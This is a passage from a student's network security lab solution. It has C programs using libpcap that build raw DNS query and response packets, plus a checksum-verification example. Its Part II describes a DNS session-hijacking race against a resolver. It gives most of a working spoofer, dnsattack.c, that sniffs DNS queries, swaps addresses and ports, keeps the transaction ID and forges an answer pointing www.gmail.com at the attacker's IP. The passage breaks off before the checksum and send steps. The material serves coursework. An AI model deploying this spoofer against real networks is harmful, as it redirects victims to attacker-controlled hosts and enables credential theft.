  int size_q_name = host_len + 2;  // size of the query name: host name + leading length byte + terminating zero

  /* Set up the pointers to the corresponding regions of the packet */
  eth = (struct ethernet_header *)(packet);
  /**************************** TO BE MODIFIED 1 ***************************/
  ip = (struct ip_header *)(packet + SIZE_ETH);
  /**************************** TO BE MODIFIED 2 ***************************/
  udp = (struct udp_header *)(packet + SIZE_ETH + sizeof(struct ip_header));
  /**************************** TO BE MODIFIED 3 ***************************/
  dns = (struct dns_header *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header));

  // Query Name Pointer:
  q_name = (u_char *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header));
  // Dns Query Pointer:
  dns_qr = (struct dns_query *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name);

  /* Ethernet Header */
  bcopy("\xA1\xA2\xA3\xA4\xA5\xA6", eth->ether_shost, 6);  // Source MAC Address
  /**************************** TO BE MODIFIED 4 ***************************/
  bcopy("\xB1\xB2\xB3\xB4\xB5\xB6", eth->ether_dhost, 6);  // Destination MAC Address
  bcopy("\x08\x00", (char *)&eth->ether_type, 2);          // Type IP (0x0800)

  /* IP Header */
  ip->ip_vhl = 0x45;          // IP version 4 & length = 5 words (20 bytes)
  ip->ip_tos = 0x00;          // Differentiated Services Field
  ip->ip_id = htons(0xf1a4);  // Identification
  ip->ip_off = 0;
  ip->ip_ttl = 64;            // time to live
  ip->ip_p = UDP_PRO;         // UDP protocol
  ip->ip_sum = 0;             // ip checksum (computed below, once the header is complete)

  (ip->ip_src).s_addr = inet_addr("1.2.3.4");  // source ip address
  /**************************** TO BE MODIFIED 5 ***************************/
  (ip->ip_dst).s_addr = inet_addr("6.7.8.9");  // destination ip address

  /* UDP Header */
  udp->udp_sport = htons(4000);
  /**************************** TO BE MODIFIED 6 ***************************/
  udp->udp_dport = htons(53);  // destination port
  udp->udp_sum = 0;            // udp checksum (computed below, once the payload is complete)

  /* DNS Header */
  dns->id = htons(0xAABB);       // transaction ID
  dns->flags = htons(0x0100);    // flags (standard query)
  dns->q_count = htons(0x0001);  // number of questions
  dns->ans_count = 0;            // number of answers
  dns->auth_count = 0;           // number of authority
  dns->add_count = 0;            // number of resource

  /* DNS Query: query_name, dns query header */
  // Convert hostname to dns format and store in memory where q_name points to
  DNS_name_converter(host, (char *)q_name);
  dns_qr->q_type = htons(1);   // type of the host
  dns_qr->q_class = htons(1);  // class

  /* Update Length of Ip Header and Udp Header */
  udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query));
  ip->ip_len = htons(sizeof(struct ip_header) + ntohs(udp->udp_len));  // total length (the original added two network-order values, which only works below 256)
  size_ip = IP_HL(ip) * 4;

  /* UPDATE CHECKSUM OF IP HEADER AND UDP HEADER */
  ip->ip_sum = 0;
  ip->ip_sum = csum((unsigned short *)(packet + SIZE_ETH), size_ip);

  udp->udp_sum = 0;
  udp->udp_sum = htons(udp_csum(ntohs(udp->udp_len), (u_short *)&ip->ip_src, (u_short *)&ip->ip_dst, (unsigned short *)udp));

  /* send packet 6 times */
  for (i = 0; i <= 5; i++) {
    result = pcap_sendpacket(descr, packet, SIZE_ETH + ntohs(ip->ip_len));
    if (result == 0)
      printf("[Packet sent successfully]\n");
    else
      printf("[Packet sent failure]\n");
  }

  pcap_close(descr);
  return 0;
}

Result with capturing packet:

• Receive 6 dns request packets
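The same arithmetic seen from the receiving side, as an added example that is not from the lab or from the student's code: it recomputes the IPv4 header checksum and the UDP pseudo-header checksum of a captured datagram, treats a zero UDP checksum as "not computed" as IPv4 allows, handles an odd payload length without reading past the buffer, and verifies a constructed copy of the part I request. The names (ones_sum, fold, ipv4_checksum, udp_checksum, verify_ipv4_udp, build_lab_request, self_check) are this example's own; the packet fields are the ones the lab specifies.

```c
#include <stdint.h>
#include <string.h>

/* Add len bytes to a one's-complement sum as big-endian 16-bit words; an odd
 * trailing byte is padded with zero without reading past the buffer. */
static uint32_t ones_sum(const uint8_t *p, size_t len, uint32_t sum)
{
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)p[i] << 8) | p[i + 1];
    if (len & 1)
        sum += (uint32_t)p[len - 1] << 8;
    return sum;
}

/* Fold the carries back in until the sum fits in 16 bits. */
static uint16_t fold(uint32_t sum)
{
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);
    return (uint16_t)sum;
}

/* IPv4 header checksum (RFC 791): one's complement of the sum over the header
 * with the checksum field (bytes 10..11) taken as zero. Caller checks the IHL. */
static uint16_t ipv4_checksum(const uint8_t *ip)
{
    size_t ihl = (size_t)(ip[0] & 0x0F) * 4;
    uint32_t sum = ones_sum(ip, 10, 0);
    sum = ones_sum(ip + 12, ihl - 12, sum);
    return (uint16_t)~fold(sum);
}

/* UDP checksum (RFC 768): pseudo header (src, dst, zero:protocol 17, UDP length)
 * + UDP header and payload with the checksum field taken as zero. A computed 0 is
 * transmitted as 0xFFFF because 0 means "no checksum" in IPv4. */
static uint16_t udp_checksum(const uint8_t *ip, const uint8_t *udp, size_t udplen)
{
    uint32_t sum = ones_sum(ip + 12, 8, 0);      /* source and destination addresses */
    sum += 17 + udplen;                          /* zero:protocol word, then length word */
    sum = ones_sum(udp, 6, sum);                 /* ports and length */
    sum = ones_sum(udp + 8, udplen - 8, sum);    /* payload, skipping the checksum field */
    uint16_t c = (uint16_t)~fold(sum);
    return c ? c : 0xFFFF;
}

/* Verify a captured IPv4/UDP datagram starting at the IP header: bit 0 set if the
 * IP checksum is valid, bit 1 set if the UDP checksum is valid or absent (zero). */
static int verify_ipv4_udp(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return 0;
    size_t ihl = (size_t)(pkt[0] & 0x0F) * 4, total = ((size_t)pkt[2] << 8) | pkt[3];
    if (ihl < 20 || total < ihl + 8 || total > len || pkt[9] != 17) return 0;
    int ok = 0;
    if (ipv4_checksum(pkt) == (((uint16_t)pkt[10] << 8) | pkt[11])) ok |= 1;
    const uint8_t *udp = pkt + ihl;
    size_t udplen = ((size_t)udp[4] << 8) | udp[5];
    if (udplen < 8 || ihl + udplen > total) return ok;
    uint16_t stored = (uint16_t)(((uint16_t)udp[6] << 8) | udp[7]);
    if (stored == 0 || udp_checksum(pkt, udp, udplen) == stored) ok |= 2;
    return ok;
}

/* The lab's part I datagram, constructed here: 1.2.3.4:4000 -> 6.7.8.9:53, TXID AABB,
 * standard query A vnexpress.net, both checksums filled in. pkt needs 64 bytes;
 * returns the total length (59). */
static size_t build_lab_request(uint8_t *pkt)
{
    static const uint8_t dns[31] = { 0xAA, 0xBB, 0x01, 0x00, 0, 1, 0, 0, 0, 0, 0, 0,
        9, 'v','n','e','x','p','r','e','s','s', 3, 'n','e','t', 0, 0, 1, 0, 1 };
    size_t udplen = 8 + sizeof dns, total = 20 + udplen;
    uint8_t ip[20] = { 0x45, 0, (uint8_t)(total >> 8), (uint8_t)total, 0xF1, 0xA4, 0, 0,
                       64, 17, 0, 0, 1, 2, 3, 4, 6, 7, 8, 9 };
    uint8_t udp[8] = { 4000 >> 8, 4000 & 0xFF, 0, 53, (uint8_t)(udplen >> 8), (uint8_t)udplen, 0, 0 };
    memcpy(pkt, ip, 20); memcpy(pkt + 20, udp, 8); memcpy(pkt + 28, dns, sizeof dns);
    uint16_t c = ipv4_checksum(pkt);
    pkt[10] = (uint8_t)(c >> 8); pkt[11] = (uint8_t)c;
    c = udp_checksum(pkt, pkt + 20, udplen);
    pkt[26] = (uint8_t)(c >> 8); pkt[27] = (uint8_t)c;
    return total;
}

/* Self-check: 0 if every step passes, otherwise the number of the failing step. */
static int self_check(void)
{
    uint8_t pkt[64];
    size_t n = build_lab_request(pkt);
    if (n != 59 || ipv4_checksum(pkt) != 0x76F8) return 1;   /* value worked by hand for this header */
    if (verify_ipv4_udp(pkt, n) != 3) return 2;               /* both checksums valid */
    pkt[40] ^= 0x01;                                          /* flip a payload bit: UDP fails, IP fine */
    if (verify_ipv4_udp(pkt, n) != 1) return 3;
    pkt[40] ^= 0x01; pkt[26] = pkt[27] = 0;                   /* zero UDP checksum = not computed */
    if (verify_ipv4_udp(pkt, n) != 3) return 4;
    pkt[8] = 63;                                              /* TTL changed, IP checksum now stale */
    if (verify_ipv4_udp(pkt, n) != 2) return 5;
    return 0;
}
```

Running verify_ipv4_udp over the part I and part II captures explains the "checksum error" Wireshark shows for them: with ip_sum and udp_sum left at 0, bit 0 is clear while bit 1 is set, because a zero UDP checksum is legal but a zero IP header checksum almost never is.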


Answer:

Dntai_dns_response_v.c (with IP and UDP checksums)

#include <stdio.h>         // printf
#include <string.h>        // strlen, memset
#include <strings.h>       // bcopy
#include <stdlib.h>        // exit
#include <sys/socket.h>    // you know what this is for
#include <arpa/inet.h>     // inet_addr, inet_ntoa, ntohs etc.
#include <netinet/in.h>
#include <unistd.h>        // getpid
#include <pcap.h>

/* Ethernet headers are always exactly 14 bytes */
#define SIZE_ETH 14

/* Ethernet addresses are 6 bytes */
#define ETHER_ADDR_LEN 6

/* UDP PROTOCOL number */
#define UDP_PROTO 17

struct dns_answer {
  u_char a_name[2];       /* answer host name (compression pointer) */
  u_short a_type;         /* answer host type */
  u_short a_class;        /* answer host class */
  u_char a_ttl[4];        /* time to live, 4 bytes */
  u_short a_len;          /* length of the address data */
  struct in_addr a_addr;  /* address of host */
};

struct dns_query {
  u_short q_type;   /* type of the host */
  u_short q_class;  /* class */
};

struct ethernet_header {
  u_char ether_dhost[ETHER_ADDR_LEN];  /* destination host address */
  u_char ether_shost[ETHER_ADDR_LEN];  /* source host address */
  u_short ether_type;                  /* IP, ARP, RARP, etc. */
};

/* IP header */
struct ip_header {
  u_char ip_vhl;     /* version << 4 | header length >> 2 */
  u_char ip_tos;     /* type of service */
  u_short ip_len;    /* total length */
  u_short ip_id;     /* identification */
  u_short ip_off;    /* fragment offset field */
  #define IP_RF 0x8000       /* reserved fragment flag */
  #define IP_DF 0x4000       /* don't fragment flag */
  #define IP_MF 0x2000       /* more fragments flag */
  #define IP_OFFMASK 0x1fff  /* mask for fragmenting bits */
  u_char ip_ttl;     /* time to live */
  u_char ip_p;       /* protocol */
  u_short ip_sum;    /* checksum */
  struct in_addr ip_src, ip_dst;
};

#define IP_HL(ip) (((ip)->ip_vhl) & 0x0f)
#define IP_V(ip)  (((ip)->ip_vhl) >> 4)

struct udp_header {
  u_short udp_sport;  /* source port */
  u_short udp_dport;  /* destination port */
  u_short udp_len;    /* udp length */
  u_short udp_sum;    /* udp checksum */
};

struct dns_header {
  u_short id;          /* transaction ID */
  u_short flags;       /* flags */
  u_short q_count;     /* number of question entries */
  u_short ans_count;   /* number of answer entries */
  u_short auth_count;  /* number of authority entries */
  u_short add_count;   /* number of additional resource entries */
};

/* functions */

void print_app_info(void) {
  printf("Dns response version 2 written by Do Nhu Tai\n");
}

void DNS_name_converter(char *host, char *dns);

/* Convert "www.vnexpress.net" into the DNS label format
   3 "www" 9 "vnexpress" 3 "net" 0: each label is preceded by its length
   byte and the name ends with a zero byte. The hostname is walked
   backwards, so the length of a label is known by the time the dot in
   front of it is reached. dns must have room for strlen(host) + 2 bytes. */
void DNS_name_converter(char *host, char *dns) {
  int len = strlen(host);
  dns[len + 1] = 0;           // terminating zero label

  int count = 0;              // characters seen since the last dot
  while (len > 0) {           // from the last character of the hostname back to the first
    if (host[len - 1] == '.') {
      dns[len] = count;       // store the length of the label that follows the dot
      count = 0;              // restart counting for the next label
    } else {
      dns[len] = host[len - 1];  // copy the character, shifted one position to the right
      count++;
    }
    len--;
  }
  dns[0] = count;             // length of the first label
}

/* ------------ FUNCTIONS TO CREATE THE CHECKSUM OF IP AND UDP ------------ */
unsigned short csum(unsigned short *buf, int nbytes);

unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[]);

/* IP header checksum: one's complement sum of the header's 16-bit words.
   nbytes is the header length in bytes (a multiple of 4, so always even). */
unsigned short csum(unsigned short *buf, int nbytes) {
  unsigned long sum = 0;
  int i;
  for (i = 0; i < (nbytes / 2); i++)
    sum += buf[i];

  sum = (sum >> 16) + (sum & 0xffff);   // fold the carries back in
  sum += (sum >> 16);

  return ~sum;
}

/* UDP checksum over the pseudo header (source IP, destination IP, protocol
   number, UDP length) plus the UDP header and payload. len is the UDP length
   in bytes and buff points at the UDP header. The result is in host byte
   order, so the caller stores htons() of it. */
unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[]) {
  unsigned short udp_protocol = UDP_PROTO;
  unsigned short padding = 0;
  unsigned long sum;
  int i;
  // Find out if the length of the data is even or odd. If odd, add a padding
  // byte = 0 at the end of the packet. buff is an array of 16-bit words, so the
  // padding byte must be addressed as a byte: buff[len] would land 2*len bytes
  // into the buffer, far past the datagram.
  if (len % 2 != 0) {
    padding = 1;
    ((unsigned char *)buff)[len] = 0;
  }

  // Initialize sum to zero
  sum = 0;

  // Sum all the buffer in 16 bit words
  for (i = 0; i < (len + padding) / 2; i++)
    sum += ntohs((unsigned short)buff[i]);

  // Sum the pseudo header which contains source ip, destination ip, protocol number and length
  for (i = 0; i < 2; i++)
    sum += ntohs((unsigned short)ip_src[i]);

  for (i = 0; i < 2; i++)
    sum += ntohs((unsigned short)ip_dst[i]);

  sum += (unsigned short)udp_protocol + (unsigned short)len;

  while (sum >> 16)
    sum = (sum & 0xFFFF) + (sum >> 16);

  return ~sum;
}

int main(int argc, char *argv[]) {
  u_char packet[5000];
  char *dev;                    // network device
  char errb[PCAP_ERRBUF_SIZE];
  pcap_t *descr;                // session description
  bpf_u_int32 net;              // ip of device
  bpf_u_int32 mask;             // subnet mask
  int i, result, size_ip;
  char *host;

  print_app_info();

  if (argc != 3) {
    printf("Usage: %s <Network Device's Name> <Hostname e.g. www.vnexpress.net>\n", argv[0]);
    exit(1);
  } else {
    dev = argv[1];
    host = argv[2];
  }

  // check for a suitable network device and store the ip, subnet mask for future use
  if (pcap_lookupnet(dev, &net, &mask, errb) == -1) {
    printf("Error: %s\n", errb);
    exit(1);
  }

  // set the pcap description
  descr = pcap_open_live(dev, BUFSIZ, 1, 0, errb);

  if (descr == NULL) {
    printf("Set description failed: %s\n", errb);
    exit(1);
  }

  // zero out the packet
  memset(packet, 0, sizeof(packet));

  /*
   ----------------------- Build a DNS RESPONSE packet -----------------------
   Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query + Dns Answer
  */

  struct ethernet_header *eth;  // pointer to the start of the ethernet header
  struct ip_header *ip;         // pointer to the start of the ip header
  struct udp_header *udp;       // pointer to the start of the udp header
  struct dns_header *dns;       // pointer to the start of the dns header
  struct dns_query *dns_qr;     // pointer to the start of the dns query

  u_char *q_name;               // DNS name in query
  struct dns_answer *dns_as;    // pointer to the start of the dns answer

  int host_len = strlen(host);      // hostname length
  int size_q_name = host_len + 2;   // size of the query name: hostname + leading length byte + terminating zero

  /* ------------ Set up pointers to the corresponding regions of the packet ------------ */
  eth = (struct ethernet_header *)(packet);
  /**************************** TO BE MODIFIED 1 ***************************/
  ip = (struct ip_header *)(packet + SIZE_ETH);
  /**************************** TO BE MODIFIED 2 ***************************/
  udp = (struct udp_header *)(packet + SIZE_ETH + sizeof(struct ip_header));
  /**************************** TO BE MODIFIED 3 ***************************/
  dns = (struct dns_header *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header));

  // Query name pointer
  q_name = (u_char *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header));
  // Dns Query pointer
  dns_qr = (struct dns_query *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name);
  // Dns Answer pointer
  dns_as = (struct dns_answer *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query));

  /* Ethernet Header */
  bcopy("\xB1\xB2\xB3\xB4\xB5\xB6", eth->ether_shost, 6);  // Source MAC Address
  /**************************** TO BE MODIFIED 4 ***************************/
  bcopy("\xA1\xA2\xA3\xA4\xA5\xA6", eth->ether_dhost, 6);  // Destination MAC Address
  bcopy("\x08\x00", (char *)&eth->ether_type, 2);          // Type IP = 0x0800

  /* IP Header */
  ip->ip_vhl = 0x45;             // IP version 4, header length = 5 words (20 bytes)
  ip->ip_tos = 0x00;             // Differentiated Services Field
  ip->ip_id = htons(0xf1a4);     // Identification
  ip->ip_off = 0;
  ip->ip_ttl = 64;               // time to live
  ip->ip_p = UDP_PROTO;          // UDP protocol
  ip->ip_sum = 0;                // ip checksum, computed below

  (ip->ip_src).s_addr = inet_addr("6.7.8.9");   // source ip address
  /**************************** TO BE MODIFIED 5 ***************************/
  (ip->ip_dst).s_addr = inet_addr("1.2.3.4");   // destination ip address

  /* UDP Header */
  udp->udp_sport = htons(53);     // source port
  /**************************** TO BE MODIFIED 6 ***************************/
  udp->udp_dport = htons(4000);   // destination port
  udp->udp_sum = 0;               // udp checksum, computed below

  /* DNS Header */
  dns->id = htons(0xAABB);        // transaction ID
  dns->flags = htons(0x8180);     // flags = standard query response, no error
  dns->q_count = htons(0x0001);   // number of questions
  dns->ans_count = htons(0x0001); // number of answers
  dns->auth_count = 0;            // number of authority RRs
  dns->add_count = 0;             // number of additional RRs

  /* DNS Query: query_name, dns query header, dns query answer */
  // Convert hostname to dns label format and store it in memory where q_name points to
  DNS_name_converter(host, (char *)q_name);
  dns_qr->q_type = htons(1);      // type of the host (A)
  dns_qr->q_class = htons(1);     // class (IN)

  /* DNS Answer */
  bcopy("\xc0\x0c", dns_as->a_name, 2);        // name: compression pointer to offset 12 (the question name)
  dns_as->a_type = htons(1);                   // type of the host (A)
  dns_as->a_class = htons(1);                  // class (IN)
  bcopy("\x00\x00\x01\xc3", dns_as->a_ttl, 4); // TTL = 451 seconds
  dns_as->a_len = htons(4);                    // 4 bytes of address data

  /**************************** TO BE MODIFIED 7 ***************************/
  dns_as->a_addr.s_addr = inet_addr("111.65.248.132");

  /* Update the length of the IP header and UDP header */
  udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query) + sizeof(struct dns_answer));
  ip->ip_len = htons(sizeof(struct ip_header) + ntohs(udp->udp_len));  // total length: add in host order, then convert once
  size_ip = IP_HL(ip) * 4;

  /* UPDATE CHECKSUM OF IP HEADER AND UDP HEADER */
  ip->ip_sum = 0;
  ip->ip_sum = csum((unsigned short *)(packet + SIZE_ETH), size_ip);
  udp->udp_sum = 0;
  udp->udp_sum = htons(udp_csum(ntohs(udp->udp_len), (u_short *)&ip->ip_src, (u_short *)&ip->ip_dst, (unsigned short *)udp));

  /* send packet 6 times */
  for (i = 0; i <= 5; i++) {
    result = pcap_sendpacket(descr, packet, SIZE_ETH + ntohs(ip->ip_len));
    if (result == 0)
      printf("Packet sent successfully!\n");
    else
      printf("Packet sent failure!\n");
  }

  return 0;
}

Result with capturing packet: received 6 dns response packets


Part II: DNS attack

Normal scenario: hereafter are the steps for the user on Host1 to connect to a website, e.g. GMAIL

• On Host1, the user enters www.gmail.com in the browser
• Host1 asks host2 for the IP address of www.gmail.com
• Host2 returns the IP address of www.google.com (ipgoogle) to host1
• Host1 connects to (ipgoogle)

Attack scenario
• The user enters www.gmail.com in the browser.
• Host3 sniffs the traffic on the wire and tries to do DNS session hijacking by racing against host2. In fact, it tries to provide a fake answer to host1 (Host3 returns its own IP address (ip3) instead of the actual IP address of gmail (ipgoogle) to host1). Host1 accepts whichever well-formed answer arrives first, so the fake answer only has to beat the real one.
• Host1 receives the fake answer from host3 and connects to host3 (ip3), believing that it is talking to www.google.com.

Task 1: Create a program running on host3, called dnsattack.c, which
• captures the network traffic and filters out the DNS packets (get the code from Lab3-part1)
• creates the fake response packet with the information mentioned above (get the code from Lab3-part1)
• sends the fake packet to host1

To help you in creating the program, I sent you the example dnsattack.c program. You need to add the appropriate code at the different places where I have marked "TO BE MODIFIED".

Answer: Dntai_dns_attack_v1.c

#include <stdio.h>          // printf, fprintf
#include <string.h>         // strlen, strstr, memset
#include <strings.h>        // bcopy
#include <stdlib.h>         // exit
#include <sys/socket.h>     // you know what this is for
#include <arpa/inet.h>      // inet_addr, inet_ntoa, ntohs etc.
#include <netinet/in.h>
#include <netinet/ether.h>  // ether_ntoa
#include <unistd.h>         // getpid, close
#include <pcap.h>

/* Ethernet headers are always exactly 14 bytes */
#define SIZE_ETH 14
/* default snap length (maximum bytes per packet to capture) */
#define SNAP_LEN 1518
/* Ethernet addresses are 6 bytes */
#define ETHER_ADDR_LEN 6
/* UDP PROTOCOL number */
#define UDP_PROTO 17

struct dns_answer {
  u_char a_name[2];       /* answer host name (compression pointer) */
  u_short a_type;         /* answer host type */
  u_short a_class;        /* answer host class */
  u_char a_ttl[4];        /* time to live, 4 bytes */
  u_short a_len;          /* length of the address data */
  struct in_addr a_addr;  /* address of host */
};

struct dns_query {
  u_short q_type;   /* type of the host */
  u_short q_class;  /* class */
};

struct ethernet_header {
  u_char ether_dhost[ETHER_ADDR_LEN];  /* destination host address */
  u_char ether_shost[ETHER_ADDR_LEN];  /* source host address */
  u_short ether_type;                  /* IP, ARP, RARP, etc. */
};

/* IP header */
struct ip_header {
  u_char ip_vhl;     /* version << 4 | header length >> 2 */
  u_char ip_tos;     /* type of service */
  u_short ip_len;    /* total length */
  u_short ip_id;     /* identification */
  u_short ip_off;    /* fragment offset field */
  #define IP_RF 0x8000       /* reserved fragment flag */
  #define IP_DF 0x4000       /* don't fragment flag */
  #define IP_MF 0x2000       /* more frag/ments flag */
  #define IP_OFFMASK 0x1fff  /* mask for fragmenting bits */
  u_char ip_ttl;     /* time to live */
  u_char ip_p;       /* protocol */
  u_short ip_sum;    /* checksum */
  struct in_addr ip_src, ip_dst;
};

#define IP_HL(ip) (((ip)->ip_vhl) & 0x0f)
#define IP_V(ip)  (((ip)->ip_vhl) >> 4)

struct udp_header {
  u_short udp_sport;  /* source port */
  u_short udp_dport;  /* destination port */
  u_short udp_len;    /* udp length */
  u_short udp_sum;    /* udp checksum */
};

struct dns_header {
  u_short id;          /* transaction ID */
  u_short flags;       /* flags */
  u_short q_count;     /* number of question entries */
  u_short ans_count;   /* number of answer entries */
  u_short auth_count;  /* number of authority entries */
  u_short add_count;   /* number of additional resource entries */
};

pcap_t *handle;  /* packet capture handle */

/* functions */
void print_app_info(void);

unsigned short csum(unsigned short *buf, int nbytes);
unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[]);

/* IP header checksum: one's complement sum of the header's 16-bit words.
   nbytes is the header length in bytes (a multiple of 4, so always even). */
unsigned short csum(unsigned short *buf, int nbytes) {
  unsigned long sum = 0;
  int i;
  for (i = 0; i < (nbytes / 2); i++)
    sum += buf[i];

  sum = (sum >> 16) + (sum & 0xffff);   // fold the carries back in
  sum += (sum >> 16);

  return ~sum;
}

/* UDP checksum over the pseudo header (source IP, destination IP, protocol
   number, UDP length) plus the UDP header and payload. len is the UDP length
   in bytes and buff points at the UDP header. The result is in host byte
   order, so the caller stores htons() of it. */
unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[]) {
  unsigned short udp_protocol = UDP_PROTO;
  unsigned short padding = 0;
  unsigned long sum;
  int i;
  // Find out if the length of the data is even or odd. If odd, add a padding
  // byte = 0 at the end of the packet. buff is an array of 16-bit words, so the
  // padding byte must be addressed as a byte: buff[len] would land 2*len bytes
  // into the buffer, far past the datagram.
  if (len % 2 != 0) {
    padding = 1;
    ((unsigned char *)buff)[len] = 0;
  }

  // Initialize sum to zero
  sum = 0;

  // Sum all the buffer in 16 bit words
  for (i = 0; i < (len + padding) / 2; i++)
    sum += ntohs((unsigned short)buff[i]);

  // Sum the pseudo header which contains source ip, destination ip, protocol number and length
  for (i = 0; i < 2; i++)
    sum += ntohs((unsigned short)ip_src[i]);

  for (i = 0; i < 2; i++)
    sum += ntohs((unsigned short)ip_dst[i]);

  sum += (unsigned short)udp_protocol + (unsigned short)len;

  while (sum >> 16)
    sum = (sum & 0xFFFF) + (sum >> 16);

  return ~sum;
}

/* Convert a DNS name in label format (3 "www" 6 "google" 3 "com" 0) back to
   dotted form ("www.google.com"). Only plain labels are handled; the question
   section of a query never contains compression pointers, so this is enough
   for the captured query but not for reading answer sections. */
char *dns_name_revert(char *q_name, char *host) {
  int count, len, first, i;
  count = 0; len = 0;
  first = q_name[count]; count++;        // length of the first label
  while (first > 0) {
    for (i = 0; i < first; i++) {        // copy the label
      host[len] = q_name[count];
      len++; count++;
    }
    first = q_name[count]; count++;      // length of the next label (0 = end of name)
    if (first > 0) {
      host[len] = '.';
      len++;
    }
  }
  host[len] = 0;
  return host;
}

void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet) {
  /* declare pointers to packet headers */
  struct ethernet_header *ethernet;  /* The ethernet header [1] */
  struct ip_header *ip;              /* The IP header */
  struct udp_header *udp;
  struct dns_header *dns;
  struct dns_query *dns_qr;
  struct dns_answer *dns_as;

  int size_ip;

  u_char new_packet[5000];
  memset(new_packet, 0, sizeof(new_packet));

  // copy the content of the captured packet to the new buffer. ip_len comes
  // off the wire, so bound the copy by what was actually captured and by the buffer.
  if (header->caplen < SIZE_ETH + sizeof(struct ip_header))
    return;
  ip = (struct ip_header *)(packet + SIZE_ETH);
  if (ntohs(ip->ip_len) + SIZE_ETH > header->caplen || ntohs(ip->ip_len) + SIZE_ETH > sizeof(new_packet)) {
    printf("   * Truncated or oversized packet, skipped\n");
    return;
  }
  bcopy(packet, new_packet, ntohs(ip->ip_len) + SIZE_ETH);

  /**************** FROM NOW ON WE WORK ON THE NEW BUFFER ****************/
  /* define ethernet header */
  ethernet = (struct ethernet_header *)(new_packet);

  // HERE I SWITCH THE MAC SOURCE
  char mac[6];
  /* print source and destination MAC addresses */
  printf("Switch the source and destination MAC addresses\n");
  printf("(Before) From: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_shost));
  printf("(Before) To: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_dhost));
  // TO BE MODIFIED 1:
  bcopy(ethernet->ether_shost, mac, 6);
  bcopy(ethernet->ether_dhost, ethernet->ether_shost, 6);
  bcopy(mac, ethernet->ether_dhost, 6);

  printf("(After) From: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_shost));
  printf("(After) To: %s\n", ether_ntoa((struct ether_addr *)ethernet->ether_dhost));

  /* define/compute ip header offset */
  ip = (struct ip_header *)(new_packet + SIZE_ETH);

  size_ip = IP_HL(ip) * 4;
  if (size_ip < 20) {
    printf("   * Invalid IP header length: %u bytes\n", size_ip);
    return;
  }

  /* print source and destination IP addresses */
  printf("Switch the source and destination IP addresses\n");
  printf("(Before) From: %s\n", inet_ntoa(ip->ip_src));
  printf("(Before) To: %s\n", inet_ntoa(ip->ip_dst));

  // TO BE MODIFIED 2: your code to swap the IP addresses
  struct in_addr ip_addr_tmp;
  ip_addr_tmp = ip->ip_src;
  ip->ip_src = ip->ip_dst;
  ip->ip_dst = ip_addr_tmp;

  printf("(After) From: %s\n", inet_ntoa(ip->ip_src));
  printf("(After) To: %s\n", inet_ntoa(ip->ip_dst));

  printf("Switch the source and destination ports\n");
  udp = (struct udp_header *)(new_packet + size_ip + SIZE_ETH);
  printf("(Before) udp source port: %d \n", ntohs(udp->udp_sport));
  printf("(Before) udp destination port: %d \n", ntohs(udp->udp_dport));

  // TO BE MODIFIED 3: your code to swap the udp ports
  u_short port_tmp;
  port_tmp = udp->udp_sport;
  udp->udp_sport = udp->udp_dport;
  udp->udp_dport = port_tmp;

  printf("(After) udp source port: %d \n", ntohs(udp->udp_sport));
  printf("(After) udp destination port: %d \n", ntohs(udp->udp_dport));

  u_char *q_name;  // DNS name in query
  int size_q_name;

  // the real IP header length (size_ip) is used for every offset, in case the query carried IP options
  dns = (struct dns_header *)(new_packet + SIZE_ETH + size_ip + sizeof(struct udp_header));

  // Query name pointer: the question name starts right after the DNS header
  q_name = (u_char *)(new_packet + SIZE_ETH + size_ip + sizeof(struct udp_header) + sizeof(struct dns_header));

  size_q_name = strlen((char *)q_name) + 1;   // label-length bytes are non-zero up to the terminating zero label

  dns_qr = (struct dns_query *)(new_packet + SIZE_ETH + size_ip + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name);
  dns_as = (struct dns_answer *)(new_packet + SIZE_ETH + size_ip + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query));

  /* ----------------------- CONSTRUCT DNS HEADER ----------------------- */
  dns->flags = htons(0x8180);     // flags = standard query response, no error (the ID is kept from the query)
  dns->q_count = htons(0x0001);   // number of questions
  dns->ans_count = htons(1);      // number of answers
  dns->auth_count = 0;            // number of authority RRs
  dns->add_count = 0;             // number of additional RRs

  /* ----------------------- CONSTRUCT DNS ANSWER ----------------------- */
  bcopy("\xc0\x0c", dns_as->a_name, 2);        // name: compression pointer to offset 12 (the question name)
  dns_as->a_type = htons(1);                   // type of the host (A)
  dns_as->a_class = htons(1);                  // class (IN)
  bcopy("\x00\x00\x05\xdb", dns_as->a_ttl, 4); // TTL = 1499 seconds
  dns_as->a_len = htons(4);                    // 4 bytes of address data

  // TO BE MODIFIED 4: change the ip address as required (the attacker's own address, passed in from main)
  dns_as->a_addr.s_addr = inet_addr((char *)args);

  /* ----------------------- CHECKSUM AND LENGTH ----------------------- */
